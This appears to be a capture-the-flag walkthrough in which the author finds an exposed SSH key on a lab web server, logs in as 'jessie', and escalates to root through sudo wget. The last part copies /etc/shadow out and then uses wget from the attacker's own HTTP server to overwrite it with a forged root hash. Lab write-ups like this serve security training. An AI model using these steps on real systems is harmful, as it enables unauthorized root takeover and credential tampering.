Nmap Output:

 

 

The home page of the website is the Apache setup page. So let's go directly to file scanning with dirb.

 

 

"/sitemap/.ssh" looks like important folder.

 

 

we have the /.ssh RSA key. Then we need a username. While browsing the site, we come across the name "jessie" in the source code of the Apache homepage.

 

 

If we do not set the required permission on the "id_rsa" key, we will get the following error.

 

 

chmod 400 id_rsa

 

With this Command it will allow the id_rsa file to be read only by the owner of the file.

 

 

Now that our ssh login is successful, we can get our first flag.

 

 

We see that we can run the wget command with sudo with the sudo -l command.

 

 

We can send the /etc/shadow file to our local machine, change the root password and send it back to jessie@ip.

 

 

 

sudo openssl passwd -6 -salt ‘hackedpasswd’ ‘password’

 

command is used to generate a salted SHA-512 hashed password using OpenSSL

 

 

python3 -m http.server 8000

 

sudo /usr/bin/wget http://10.8.60.115:8000/shadow.txt -O /etc/shadow

 

command use the wget utility to download shadow.txt our http server and save it as /etc/shadow on your local system.